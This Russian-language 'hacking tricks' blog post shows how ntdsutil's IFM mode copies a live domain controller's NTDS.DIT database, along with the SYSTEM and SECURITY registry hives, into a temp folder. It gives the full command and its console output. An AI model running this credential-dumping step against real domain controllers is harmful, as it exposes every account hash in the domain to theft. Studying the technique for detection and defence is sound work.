[hacking tricks] Easy way to get a ntds.dit

[hacking tricks] Easy way to get a ntds.dit
Все секреты Active Directory как известно хранятся в одном единственном файлике NTDS.DIT, который представляет из себя специально разработанную компанией Microsoft базу данных. Для получения копии этой базы варварским способом может использоваться механизм   теневых копий . Почему варварским? Да потому, что в момент создания теневой копии в базе могут выполняться различные транзакции, что несколько повлияет на целостность полученной копии. Но начиная с Windows 2008 корпорация добра расширила возможности утилиты  Ntdsutil , что позволяет стащить базу NTDS.DIT с работающей системы не повредив ее при этом. Раньше применение утилиты Ntdsutil ограничивалось режимом восстановления контроллера домена .

Спасибо за находку  @obscuresec !!

C:WindowsSystem32>

Microsoft Windows [Версия 6.0.6001]
(C) Корпорация Майкрософт, 2006. Все права защищены.

C:Windowssystem32>ntdsutil "ac in ntds" "ifm" "cr fu c:WindowsTempabc" q q

ntdsutil: ac in ntds
Активный экземпляр - "ntds".
ntdsutil: ifm
IFM: cr fu c:WindowsTempabc
Создание снимка...
Успешно создан набор снимков {8d6cf811-ccd4-4dbe-9190-b911bb96196a}.
Снимок {f31648c2-0afd-4c5d-bd05-54e42debe6f1} установлен как C:$SNAP_2014041214
02_VOLUMEC$
Снимок {f31648c2-0afd-4c5d-bd05-54e42debe6f1} уже подключен.
Запуск режима ДЕФРАГМЕНТАЦИИ...
Исходная база данных: C:$SNAP_201404121402_VOLUMEC$WindowsNTDSntds.dit
Конечная база данных: c:WindowsTempabcActive Directoryntds.dit

Defragmentation Status (% complete)

0 10 20 30 40 50 60 70 80 90 100
|----|----|----|----|----|----|----|----|----|----|
...................................................

Копирование файлов реестра...
Копирование c:WindowsTempabcregistrySYSTEM
Копирование c:WindowsTempabcregistrySECURITY
Снимок {f31648c2-0afd-4c5d-bd05-54e42debe6f1} отключен.
Носитель IFM успешно создан в c:WindowsTempabc
IFM: q
ntdsutil: q

C:Windowssystem32>

Alt text
Комментарии для сайта Cackle